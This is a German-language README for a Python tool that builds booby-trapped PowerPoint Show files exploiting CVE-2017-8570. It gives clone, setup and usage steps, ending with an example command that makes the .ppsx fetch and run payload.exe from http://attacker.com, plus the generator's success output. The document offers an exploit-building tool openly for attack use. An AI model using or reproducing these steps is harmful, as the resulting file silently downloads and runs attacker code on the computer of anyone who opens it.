
ppsx-Dateigenerator für cve-2017-8570 (basierend auf bhdresh/cve-2017-8570)
Von Temesgen Yibeltal [email protected] (Basiert auf Code von https://github.com/bhdresh/CVE-2017-8570 (inzwischen entfernt))
ppsx-file-generator ist ein Python-Tool, das eine PowerPoint-Show-Datei erzeugt, die Code aus einer entfernten Quelle basierend auf einer vorhandenen Datei ausführt.
Das Tool generiert eine PowerPoint-Show-Datei und eine XML-Datei basierend auf den bereitgestellten Eingaben. Die PowerPoint-Datei greift auf die XML-Datei zu, die Informationen über die Payload-Datei enthält. Ein Angreifer könnte die XML-Datei und die Payload auf einem lokalen oder öffentlichen Server bereitstellen und die URL für jede als Eingabe angeben.
Zuerst den Code holen:
git clone https://github.com/temesgeny/ppsx-file-generator.git
ppsx-file-generator ist in Python geschrieben und benötigt zipfile, das mit Pip installiert werden kann:
pip install zipfile
Erfordert Microsoft Office Power Point, um diese Aufgabe auszuführen.
Öffnen Sie zuerst Microsoft Office Power Point und öffnen Sie 'template.ppsx'. Öffnen Sie Ihre eigene Präsentationsdatei und kopieren Sie das Symbol 'Coder.exe' aus template.ppsx auf Folie 1 Ihrer PowerPoint-Datei. Speichern Sie die Datei als Power Point Show (.ppsx). Verwenden Sie dann das Python-Tool wie folgt:
Usage: generate_ppsx.py input_filename -o output_filename -p payload_uri -x xml_uri
input_filename The input ppsx file name.
-o Output .ppsx file name, (inlcude the .ppsx).
-p The payload exe or sct file url.
It must be in an accessible web server. (Optional for xml file)
-x The full xml uri to be called by the ppsx file.
It must be in an accessible web server.(Required)
python generate_ppsx.py -o output.ppsx -p http://attacker.com/payload.exe -x http://attacker.com/content.xml input.ppsx
Generated content.xml successfully
Generated output.ppsx successfully